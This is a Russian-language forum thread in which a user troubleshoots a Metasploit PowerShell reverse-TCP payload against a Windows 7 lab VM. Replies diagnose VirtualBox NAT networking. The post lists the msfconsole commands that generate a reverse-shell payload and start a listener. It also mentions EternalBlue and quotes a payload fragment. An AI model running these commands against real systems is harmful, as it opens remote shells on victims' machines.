• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

В Kali linux не создается сеанс Powershell через payload

V

Vtwin

New member
15.06.2021
3
0
BIT
0
Вобщем проблемма следующая. Не приходит сессия powershell в Kali linux.

sudo msfconsole
use payload/cmd/windows/powershell_reverse_tcp
set lhost
set lport
generate -f raw

use exploit/multi/handler
set payload cmd/windows/powershell_reverse_tcp
set lhost
set lport
exploit -j

Запускаю на виртуалке с Windows 7 сгенерированный bat фаил и на этом все...
Все тоже самое делал в Ubuntu и что самое интересное - все работает! Даже при атаке темже Eternalblue payload powershell срабатывает и сессия приходит в Ubuntu, а в Kali - нет! Вот так... У кого какие мысли на этот счет?
 
Сортировать по дате Сортировать по голосам
Самое очевидное - айпишник кали правильно указан? Какой тип адаптера у кали (если она на ВМ)?
 
За 0 Против
Pernat1y сказал(а):
Самое очевидное - айпишник кали правильно указан? Какой тип адаптера у кали (если она на ВМ)?
Нажмите, чтобы раскрыть...
Да все вроде указанно правильно. Говорю же , на Ubuntu проверял - работает. Кали на виртуалке и Ubuntu то же. Адаптер на кали eth1 сеть NAT Причем, если использовать payload cmd/windows/reverse_powershell , генерируется обычный powershell код без шифрования и на kali почему то приходит сессия, но ввиде обычного коммандного шела windows, но не сам powershell, как бы хотелось.
 
За 0 Против
Vtwin сказал(а):
Адаптер на кали eth1 сеть NAT
Нажмите, чтобы раскрыть...

Ты не подключишься к ВМ, у которой адаптер NAT (если дополнительно не пробрасывал туда порты средствами того-же VirtualBox).
Дока тут -
Ссылка скрыта от гостей

1623853360561.png



Vtwin сказал(а):
на kali почему то приходит сессия, но ввиде обычного коммандного шела windows
Нажмите, чтобы раскрыть...
Как-бы так и должно быть. Powershell - это выходной формат пейлоада, а не интерпретатор, который будет использоваться для выполнения команд:
$p.StartInfo.FileName='cmd.exe';


Vtwin сказал(а):
как бы хотелось
Нажмите, чтобы раскрыть...
Что мешает запустить powershell через полученный шелл cmd?
 
За 0 Против
Pernat1y сказал(а):
Ты не подключишься к ВМ, у которой адаптер NAT (если дополнительно не пробрасывал туда порты средствами того-же VirtualBox).
Дока тут -
Ссылка скрыта от гостей

Посмотреть вложение 50665



Как-бы так и должно быть. Powershell - это выходной формат пейлоада, а не интерпретатор, который будет использоваться для выполнения команд:
$p.StartInfo.FileName='cmd.exe';



Что мешает запустить powershell через полученный шелл cmd?
Нажмите, чтобы раскрыть...
Извиняюсь за то что сразу все не озвучил. Дело еще и в том, что Kali стоит у меня еще и на хосте. Когда я задействовал ее, у винды на virtualbox тип подключения был выбран как сетевой мост. Эффект тот же.
Да и причем здесь проброс портов, когда на Ubuntu все приходит без проблем.

Что мешает запустить powershell через полученный шелл cmd?

Курсор виснет, невозможно выполнить не одной комманды.
 
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ